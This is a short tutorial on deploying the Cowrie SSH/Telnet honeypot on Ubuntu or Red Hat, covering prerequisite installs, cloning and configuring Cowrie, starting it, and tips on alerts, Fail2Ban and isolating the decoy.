How to Deploy a Honeypot on Your Linux Server to Observe Attackers in Real Time

What if you could do more than just block attackers — what if you could watch them? Honeypots let you do exactly that. By setting up a decoy system that looks vulnerable, you can monitor malicious behavior, study attack methods, and gather valuable intelligence — all without risking your actual server.

In this guide, we’ll walk you through setting up a simple yet effective honeypot using Cowrie, an SSH/Telnet honeypot, on Ubuntu or Red Hat. No complex intrusion detection system (IDS) needed.

---

1. What Is a Honeypot?

• A decoy system designed to attract and engage attackers

• Lets you monitor attack vectors, tools, and behavior in real time

• Useful for research, logging, and triggering alerts

---

2. Select Your Honeypot Tool

We’ll use Cowrie — a popular open-source honeypot that emulates SSH and Telnet environments, logging all interactions for analysis.

---

3. Install Prerequisites

On Ubuntu:

sudo apt update
sudo apt install git python3-venv python3-pip libssl-dev libffi-dev build-essential

On Red Hat:

sudo yum groupinstall "Development Tools"
sudo yum install python3-pip python3-devel libffi-devel openssl-devel git

---

4. Clone and Configure Cowrie

git clone https://github.com/cowrie/cowrie.git
cd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
cp etc/cowrie.cfg.dist etc/cowrie.cfg

---

5. Start Cowrie

bin/cowrie start

By default, Cowrie runs on port 2222, emulating an SSH server and logging every interaction.

---

6. What You'll Discover

Cowrie logs a wealth of attacker data, including:

• Source IP addresses

• Login attempts and brute-force attacks

• Commands executed

• Malware payloads/scripts attempted

---

7. Pro Tips for Better Insights

• Set up log alerts: Use email or Discord webhooks for real-time notifications

• Use Fail2Ban: Protect your actual SSH port while monitoring the honeypot

• Isolate the honeypot: Run it on a separate VM or container — never on production systems

---

Conclusion

While a honeypot isn’t a replacement for firewalls or monitoring tools, it gives you something they can’t: insight into the mindset of your attackers. It’s not just about defense — it’s about learning from the threats you face.